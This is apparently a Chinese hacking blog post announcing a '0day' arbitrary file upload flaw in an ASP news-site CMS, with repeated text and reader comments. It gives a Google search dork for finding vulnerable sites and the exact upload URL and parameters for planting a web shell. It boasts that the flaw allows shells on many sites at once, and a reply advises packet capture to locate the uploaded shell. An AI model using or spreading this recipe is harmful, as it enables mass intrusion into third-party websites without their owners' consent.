今天呢,发布一个0day,是一个任意上传漏洞。
谷歌关键字:inurl:newslist.asp?NodeCode=
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
任意上传拿shell
很吃香哦
出图测试
任意文件上传漏洞可批量拿shell
阿峰
保持饥渴的专注,追求最佳的品质
今天呢,发布一个0day,是一个任意上传漏洞。
谷歌关键字:inurl:newslist.asp?NodeCode=
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
任意上传拿shell
很吃香哦
出图测试
阿峰
保持饥渴的专注,追求最佳的品质
文章评论
请问怎么找马地址 我的博客
@Sh1Ft2b 抓包
上传成功后的文件地址是什么?